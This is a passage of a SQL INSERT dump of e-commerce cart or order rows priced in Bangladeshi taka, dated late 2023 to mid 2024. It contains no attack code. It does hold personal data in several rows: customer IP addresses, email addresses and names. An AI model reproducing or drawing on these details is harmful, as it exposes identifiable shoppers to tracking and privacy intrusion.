(352, 1, '2023-11-20 03:56:33', '2023-11-20 03:56:33', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '187.143.96.194', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(353, 1, '2023-11-20 04:02:12', '2023-11-20 04:02:12', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '112.205.9.78', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(354, 1, '2023-11-20 04:04:53', '2023-11-20 04:04:53', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 111.0000, 111.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '190.57.151.148', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(355, 1, '2023-11-20 04:18:38', '2023-11-20 04:18:38', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '101.56.154.32', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(356, 1, '2023-11-20 04:45:50', '2023-11-20 04:45:50', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 111.0000, 111.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '201.4.196.31', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(357, 1, '2023-11-24 01:23:51', '2023-11-24 01:23:51', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 80, NULL, 1, 'llofaR.hqbmdjm@monochord.xyz', NULL, 'DTAkrKLzJLDh', NULL, 'DTAkrKLzJLDh', NULL, NULL, NULL, 1, 0, '185.142.238.138', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(358, 1, '2023-11-26 22:37:28', '2023-11-26 22:37:28', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 81, NULL, 1, 'UKlRFi.tdwcpwb@borasca.xyz', NULL, 'sEslIznAFyK', NULL, 'sEslIznAFyK', NULL, NULL, NULL, 1, 0, '45.128.232.56', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(359, 1, '2023-12-01 00:22:48', '2023-12-01 00:22:48', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 82, NULL, 1, 'mXJwLI.ddwjjjc@paravane.biz', NULL, 'OzEsEpczSeJ', NULL, 'OzEsEpczSeJ', NULL, NULL, NULL, 1, 0, '84.54.51.31', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(360, 1, '2023-12-02 06:52:19', '2023-12-02 06:52:19', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 83, NULL, 1, 'JpdHmx.mhqwpp@virilia.life', NULL, 'Cal', NULL, 'Cal', NULL, NULL, NULL, 1, 0, '185.81.167.242', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(361, 1, '2023-12-07 10:59:18', '2023-12-07 10:59:18', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 84, NULL, 1, 'vnYduX.qcchhhd@tonetics.biz', NULL, 'Alena', NULL, 'Alena', NULL, NULL, NULL, 1, 0, '213.232.235.104', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(362, 1, '2023-12-08 12:58:10', '2023-12-08 12:58:10', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 85, NULL, 1, 'nihaca9350@newcupon.com', NULL, 'ngf', NULL, 'ngtfc', NULL, NULL, NULL, 1, 0, '198.98.48.53', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(363, 1, '2023-12-10 12:24:35', '2023-12-10 12:24:35', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 86, NULL, 1, 'enWHil.pwqwtmh@usufruct.bar', NULL, 'cEDkxzJuaJVEuA', NULL, 'cEDkxzJuaJVEuA', NULL, NULL, NULL, 1, 0, '192.144.39.152', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(364, 1, '2023-12-12 04:13:58', '2023-12-12 04:13:58', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 87, NULL, 1, 'LJvenn.twtjtbb@brasswire.me', NULL, 'Nicholas', NULL, 'Nicholas', NULL, NULL, NULL, 1, 0, '172.93.213.157', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(365, 1, '2023-12-13 18:55:52', '2023-12-13 18:55:52', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 88, NULL, 1, 'VSszAf.wbwhdcm@usufruct.bar', NULL, 'UqDMfBhCNSBkyhDs', NULL, 'UqDMfBhCNSBkyhDs', NULL, NULL, NULL, 1, 0, '192.144.39.152', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(366, 1, '2023-12-15 15:09:38', '2023-12-15 15:09:38', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 336.8000, 336.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '45.13.254.28', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 421.0000, 421.0000, 336.8000, 336.8000, 1, 0, NULL, NULL, 0),
(367, 1, '2023-12-19 09:58:31', '2023-12-19 09:59:35', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 519.4000, 519.4000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '103.164.163.24', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 643.0000, 643.0000, 514.4000, 514.4000, 1, 0, NULL, NULL, 0),
(368, 1, '2023-12-31 13:54:47', '2023-12-31 13:54:47', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 89, NULL, 1, 'AsdUld.btbbbwp@purline.top', NULL, 'Karter', NULL, 'Karter', NULL, NULL, NULL, 1, 0, '192.144.39.93', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(369, 1, '2023-12-31 16:54:02', '2023-12-31 16:54:02', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '85.239.235.48', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(370, 1, '2023-12-31 16:54:16', '2023-12-31 16:54:16', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '85.239.235.48', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(371, 1, '2023-12-31 16:54:27', '2023-12-31 16:54:27', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '85.239.235.48', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(372, 1, '2023-12-31 16:54:40', '2023-12-31 16:54:40', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 111.0000, 111.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '85.239.235.48', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(373, 1, '2023-12-31 16:54:55', '2023-12-31 16:54:55', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 111.0000, 111.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '85.239.235.48', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(374, 1, '2024-01-01 21:04:18', '2024-01-01 21:04:18', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 90, NULL, 1, 'xEMMrX.bmpbhch@lustrum.cfd', NULL, 'Milani', NULL, 'Milani', NULL, NULL, NULL, 1, 0, '192.144.39.132', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(375, 1, '2024-01-06 10:19:57', '2024-01-06 10:19:57', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 111.0000, 111.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '23.162.40.61', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(376, 1, '2024-01-13 05:36:15', '2024-01-13 05:36:15', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '20.14.84.239', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(377, 1, '2024-01-13 05:36:15', '2024-01-13 05:36:15', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '20.14.84.239', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(378, 1, '2024-01-13 05:36:15', '2024-01-13 05:36:15', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 111.0000, 111.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '20.14.84.239', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(379, 1, '2024-01-13 05:36:15', '2024-01-13 05:36:15', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 111.0000, 111.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '20.14.84.239', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(380, 1, '2024-01-13 05:36:15', '2024-01-13 05:36:15', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '20.14.84.239', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(381, 1, '2024-01-27 10:55:02', '2024-01-27 10:55:02', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 91, NULL, 1, 'EsxqRJ.bqbqhd@chiffon.fun', NULL, 'Rebecca', NULL, 'Rebecca', NULL, NULL, NULL, 1, 0, '192.144.39.173', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(382, 1, '2024-02-02 05:46:57', '2024-02-02 05:46:57', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 92, NULL, 1, 'bVSxDv.dcwmqb@sabletree.foundation', NULL, 'Tony', NULL, 'Tony', NULL, NULL, NULL, 1, 0, '37.120.247.217', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(383, 1, '2024-02-02 08:44:49', '2024-02-02 08:44:49', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '112.200.167.84', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(384, 1, '2024-02-03 05:47:56', '2024-02-03 05:47:56', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 336.8000, 336.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '86.38.242.200', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 421.0000, 421.0000, 336.8000, 336.8000, 1, 0, NULL, NULL, 0),
(385, 1, '2024-02-03 13:15:09', '2024-02-03 13:15:09', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 336.8000, 336.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '86.38.242.200', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 421.0000, 421.0000, 336.8000, 336.8000, 1, 0, NULL, NULL, 0),
(386, 1, '2024-02-05 02:48:05', '2024-02-05 02:48:05', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 93, NULL, 1, 'ubAqze.mdtqpm@chiffon.fun', NULL, 'Zaid', NULL, 'Zaid', NULL, NULL, NULL, 1, 0, '176.123.2.160', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(387, 1, '2024-02-16 23:27:59', '2024-02-16 23:27:59', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 94, NULL, 1, 'HqTfja.ttdqjhq@flexduck.click', NULL, 'Ivan', NULL, 'Ivan', NULL, NULL, NULL, 1, 0, '78.40.116.193', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(388, 1, '2024-02-24 22:49:52', '2024-02-24 22:49:52', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 95, NULL, 1, 'BhKWfr.pwbctjc@rushlight.cfd', NULL, 'Emerson', NULL, 'Emerson', NULL, NULL, NULL, 1, 0, '213.232.235.91', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(389, 1, '2024-02-28 04:29:23', '2024-02-28 04:29:23', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '86.38.242.200', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(390, 1, '2024-03-06 08:37:31', '2024-03-06 08:37:31', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 96, NULL, 1, 'VPVPVF.pmqjmbd@kerfuffle.asia', NULL, 'Ryland', NULL, 'Ryland', NULL, NULL, NULL, 1, 0, '159.253.120.5', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(391, 1, '2024-03-12 15:33:50', '2024-03-12 15:33:50', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 97, NULL, 1, 'yawDKK.phtptc@sabletree.foundation', NULL, 'Demetrius', NULL, 'Demetrius', NULL, NULL, NULL, 1, 0, '146.70.80.81', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(392, 1, '2024-03-20 12:13:18', '2024-03-20 12:13:19', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, 'admin@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(393, 1, '2024-03-21 12:09:50', '2024-03-21 12:09:51', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, 'admin@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(394, 1, '2024-03-24 16:47:59', '2024-03-24 16:48:00', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, 'admin@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(395, 1, '2024-03-28 08:27:20', '2024-03-28 08:27:20', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 98, NULL, 1, 'qdjwjbdbhd.hq@monochord.xyz', NULL, 'ethna', NULL, 'ethna', NULL, NULL, NULL, 1, 0, '146.70.80.79', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(396, 1, '2024-03-31 03:15:53', '2024-03-31 03:15:53', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(397, 1, '2024-04-19 02:11:20', '2024-04-19 02:11:20', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 336.8000, 336.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '217.196.53.11', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 421.0000, 421.0000, 336.8000, 336.8000, 1, 0, NULL, NULL, 0),
(398, 1, '2024-04-19 09:52:41', '2024-04-19 09:52:41', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '206.189.81.232', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(399, 1, '2024-04-26 14:35:21', '2024-04-26 14:35:21', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 514.4000, 514.4000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '103.127.0.229', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 643.0000, 643.0000, 514.4000, 514.4000, 1, 0, NULL, NULL, 0),
(400, 1, '2024-05-02 14:19:52', '2024-05-02 14:19:52', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(401, 1, '2024-05-04 04:53:41', '2024-05-04 04:53:41', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 336.8000, 336.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '217.196.53.11', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 421.0000, 421.0000, 336.8000, 336.8000, 1, 0, NULL, NULL, 0),
(402, 1, '2024-05-21 09:03:34', '2024-05-21 09:03:34', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 336.8000, 336.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '217.196.53.11', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 421.0000, 421.0000, 336.8000, 336.8000, 1, 0, NULL, NULL, 0),
(403, 1, '2024-06-05 13:39:59', '2024-06-05 13:39:59', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 336.8000, 336.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '217.196.53.11', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 421.0000, 421.0000, 336.8000, 336.8000, 1, 0, NULL, NULL, 0),
(404, 1, '2024-06-17 01:57:51', '2024-06-17 01:57:51', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 99, NULL, 1, 'alikee53616@5dub.lolcorp.online', NULL, 'Ivan', NULL, 'Gamaz', NULL, NULL, NULL, 1, 0, '73.207.168.225', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(405, 1, '2024-07-30 16:51:30', '2024-07-30 16:51:39', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(406, 1, '2024-07-31 13:14:50', '2024-07-31 13:14:50', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(407, 1, '2024-07-31 19:34:30', '2024-07-31 19:35:08', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(408, 1, '2024-08-01 03:06:51', '2024-08-01 03:13:41', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(409, 1, '2024-08-01 05:09:56', '2024-08-01 05:17:17', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
